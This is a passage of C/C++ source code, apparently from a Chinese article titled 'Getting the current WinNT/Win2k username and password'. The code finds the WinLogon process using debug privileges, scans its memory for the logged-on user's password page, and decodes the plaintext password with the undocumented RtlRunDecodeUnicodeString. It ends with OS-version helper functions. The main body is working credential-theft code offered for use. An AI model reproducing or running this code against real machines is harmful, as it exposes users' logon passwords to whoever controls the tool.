获取WinNT/Win2k当前用户名和密码(2)
);pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION)
GetProcAddress(hNtDll,"NtQuerySystemInformation");
pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER)
GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer");
pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION)
GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation");
pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER)
GetProcAddress(hNtDll,"RtlDestroyQueryDebugBuffer");
pfnRtlRunDecodeUnicodeString =(PFNTRTLRUNDECODEUNICODESTRING)
GetProcAddress(hNtDll,"RtlRunDecodeUnicodeString");
// Locate WinLogon's PID - need debug privilege and admin rights.
DWORD dwWinLogonPID = FindWinLogon ();
if(!dwWinLogonPID)
{
// 很难找到进程WinLogon 或正在使用 NWGINA.DLL
// 导致不能在内存中找到密码
FreeLibrary(hNtDll);
return false;
}
// Format("主进程WinLogon的id是 %d (0x%8.8x).\n",
// ARRAYOFCONST(((int)dwWinLogonPID, (int)dwWinLogonPID))));
// Set values to check memory block against.
memset(wszUserName, 0, sizeof (wszUserName));
memset(wszUserDomain, 0, sizeof (wszUserDomain));
GetEnvironmentVariableW(L"USERNAME",wszUserName,0x400);
GetEnvironmentVariableW(L"USERDOMAIN", wszUserDomain, 0x400);
// Locate the block of memory containing
// the password in WinLogon's memory space.
BOOL bFoundPasswordPage;
//bFoundPasswordPage = FALSE;
if(IsWin2K())
bFoundPasswordPage = LocatePasswordPageWin2K(dwWinLogonPID, &dwPwdLen);
else
bFoundPasswordPage = LocatePasswordPageWinNT(dwWinLogonPID, &dwPwdLen);
if(bFoundPasswordPage)
{
if(dwPwdLen == 0)
{
// Format("登陆信息为: 域名:%S/密码:%S.\n",
// ARRAYOFCONST((wszUserDomain, wszUserName))));
// 密码长度为空,系统没有密码
}
else
{
// Format("找到了密码,长度为%d\n", ARRAYOFCONST(((int)dwPwdLen))));
// Decode the password string.
if(IsWin2K())
ReturnWin2kPwd(strCurrDomain, strCurrUser, strCurrPwd);
else
ReturnWinNTPwd(strCurrDomain, strCurrUser, strCurrPwd);
}
}
else
{
FreeLibrary(hNtDll);
return false;
}// 没有在内存中间找到密码
return true;
}
//---------------------------------------------------------------------------
// Report whether the running OS is on the Windows NT platform line.
// Fills an OSVERSIONINFO via GetVersionEx and compares dwPlatformId
// against VER_PLATFORM_WIN32_NT. Returns FALSE when GetVersionEx fails
// (the caller cannot distinguish "not NT" from "query failed").
BOOL IsWinNT(void)
{
    OSVERSIONINFO ver;
    // GetVersionEx requires the structure size to be set before the call.
    ver.dwOSVersionInfoSize = sizeof ver;
    if (!GetVersionEx(&ver))
        return FALSE;
    return ver.dwPlatformId == VER_PLATFORM_WIN32_NT;
}
//---------------------------------------------------------------------------
// Report whether the running OS is Windows 2000: NT platform with
// major version 5. Returns FALSE when GetVersionEx fails.
// NOTE: major version 5 is not unique to Windows 2000 — later 5.x
// releases also satisfy this test; only the major version is checked.
BOOL IsWin2K(void)
{
    OSVERSIONINFO ver;
    // GetVersionEx requires the structure size to be set before the call.
    ver.dwOSVersionInfoSize = sizeof ver;
    if (!GetVersionEx(&ver))
        return FALSE;
    const bool isNt = (ver.dwPlatformId == VER_PLATFORM_WIN32_NT);
    const bool isV5 = (ver.dwMajorVersion == 5);
    return isNt && isV5;
}
//---------------------------------------------------------------------------